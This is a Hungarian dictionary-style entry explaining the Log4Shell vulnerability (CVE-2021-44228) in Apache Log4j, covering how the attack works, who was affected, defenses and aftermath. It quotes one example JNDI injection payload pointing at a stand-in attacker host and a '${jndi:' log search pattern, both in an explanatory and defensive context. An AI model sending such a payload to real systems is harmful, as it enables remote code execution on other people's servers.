szó jelentését keresi. A DICTIOUS-ban nem csak a
szó összes szótári jelentését megtalálod, hanem megismerheted az etimológiáját, a jellemzőit és azt is, hogyan kell a
szót egyes és többes számban mondani. Minden, amit a
szóról tudni kell, itt található. A
szó meghatározása segít abban, hogy pontosabban és helyesebben fogalmazz, amikor beszélsz vagy írsz. A
és más szavak definíciójának ismerete gazdagítja a szókincsedet, és több és jobb nyelvi forráshoz juttat.
Főnév
Log4Shell (tsz. Log4Shells)
- (informatika) Log4Shell egy kritikus biztonsági sebezhetőség neve, amelyet 2021. decemberében fedeztek fel az Apache Log4j naplózókönyvtárban. Ez a hiba (CVE-2021-44228) lehetővé tette a támadók számára, hogy távoli kódfuttatást (RCE – Remote Code Execution) hajtsanak végre olyan rendszereken, amelyek Log4j-t használnak – vagyis teljesen átvehették az irányítást az érintett szerverek felett.
Log4Shell az egyik legsúlyosabb sebezhetőség a kiberbiztonság történetében, mert:
- széles körben használt komponensben van (milliók által),
- nagyon könnyen kihasználható,
- és nagyon súlyos következményekkel járhat.
🧩 Mi az a Log4j?
Az Apache Log4j egy Java-nyelven írt, nyílt forráskódú naplózási könyvtár, amelyet széles körben használnak Java-alapú alkalmazásokban, például:
- webes szolgáltatásokban,
- vállalati szoftverekben,
- játékokban (pl. Minecraft),
- szerveralkalmazásokban (Tomcat, Spring, ElasticSearch stb.).
Mivel a Log4j a Java ökoszisztéma egyik alapköve, milliónyi rendszer vált sebezhetővé a Log4Shell miatt.
🕳️ Hogyan működik a Log4Shell sebezhetőség?
A sebezhetőség azzal függ össze, hogy a Log4j naplózáskor speciális karaktereket tartalmazó szövegeket értelmez, például:
${jndi:ldap://attacker.com/exploit}
Támadás menete:
- A támadó egy olyan szöveget küld a célalkalmazásnak, amely naplózásra kerül (pl. HTTP header, User-Agent, URL).
- A Log4j a
${jndi:...}
szintaxist értékesnek tekinti, és megpróbálja lekérni a megadott címet.
- Ha a cím egy támadó által irányított LDAP szerver, az visszaküld rosszindulatú Java objektumot.
- A Log4j letölti és futtatja azt – így a támadó távoli kódot futtathat a célgépén.
🎯 Miért volt ez ennyire súlyos?
- Egyszerű volt a kihasználás: elég volt egy speciálisan formázott szöveget küldeni.
- Nem kellett hozzá hitelesítés: bárki, bárhonnan támadhatta.
- Több protokollt érintett: HTTP, LDAP, DNS stb.
- Milliókat érintett: szinte minden Java-alapú rendszer használta/használja a Log4j-t.
- Automatizált támadások jelentek meg néhány órán belül.
- Cryptominer malware-ek, botnetek, Cobalt Strike is használták.
🧠 Ki fedezte fel?
A sebezhetőséget Chen Zhaojun, az Alibaba Cloud Security Team kutatója fedezte fel és jelentette 2021. november végén. A hiba publikus bejelentése 2021. december 9-én történt, és néhány órán belül globális támadáshullám indult meg.
🌐 Kik voltak érintettek?
Gyakorlatilag minden Java-alapú rendszer, például:
- Amazon Web Services (AWS)
- Apple iCloud
- Steam
- Twitter
- Minecraft szerverek
- IBM, Cisco, Google, VMware rendszerek
A hiba miatt sok szolgáltató vészhelyzeti frissítéseket adott ki, és még ma is találhatók sebezhető rendszerek.
🧰 Védekezés Log4Shell ellen
1. Frissítés
- A Log4j 2.16.0 verzió és későbbi verziók eltávolították a JNDI támogatást, ami a hiba alapja volt.
2. Konfigurációs védelem
- A
log4j2.formatMsgNoLookups
opció true
-ra állítása segített a korai védekezésben.
- JNDI hozzáférés korlátozása tűzfallal és Java biztonsági policy-val.
3. IDS/IPS rendszerek frissítése
- Snort, Suricata, WAF-ek (Web Application Firewall) friss szabályokat kaptak a mintázat felismerésére.
4. Log-elemzés és forensics
- Naplófájlok átvizsgálása
${jndi:
minták után.
- Gyanús hálózati kapcsolatok (LDAP, RMI, DNS) naplózása.
📚 Log4Shell utóhatásai
Hatás
|
Leírás
|
Pánik a vállalati IT-ban
|
Az adminok világszerte sürgősen patch-eltek, éjszakai ügyeletek indultak.
|
Automatizált szkennelések
|
Botok tömege próbálta kihasználni a hibát, akár zombihálózat építésére is.
|
Alkalmazásláncok sebezhetősége
|
Még ha a fő rendszer friss is, egy könyvtár egy régi verziója is veszélyt jelenthetett.
|
Fókusz az ellátási lánc biztonságára
|
A Log4Shell újabb bizonyíték volt arra, hogy a szoftverellátási lánc törékeny.
|
Security by design jelentősége
|
Új lendületet kapott a biztonságtudatos fejlesztés (DevSecOps) fontossága.
|
✅ Összefoglalás
Fogalom
|
Tartalom
|
Név
|
Log4Shell
|
CVE
|
CVE-2021-44228
|
Felfedezés ideje
|
2021. december
|
Szoftver
|
Apache Log4j (Java naplózó könyvtár)
|
Típus
|
Távoli kódfuttatás (Remote Code Execution – RCE)
|
Kihasználás
|
JNDI manipuláció naplózott szövegen keresztül
|
Súlyosság
|
Kritikus (CVSS 10/10)
|
Védekezés
|
Frissítés, konfigurációs tiltás, IDS, forensics
|
Hatás
|
Globális, minden Java-alapú rendszer érintett lehetett
|
A Log4Shell egy ébresztő volt a világ számára, hogy még a legkisebb, ártatlannak tűnő kódrészletek is globális sebezhetőséget jelenthetnek. A fejlesztők, rendszergazdák és biztonsági szakemberek ma már sokkal éberebbek a harmadik féltől származó komponensek használatával kapcsolatban.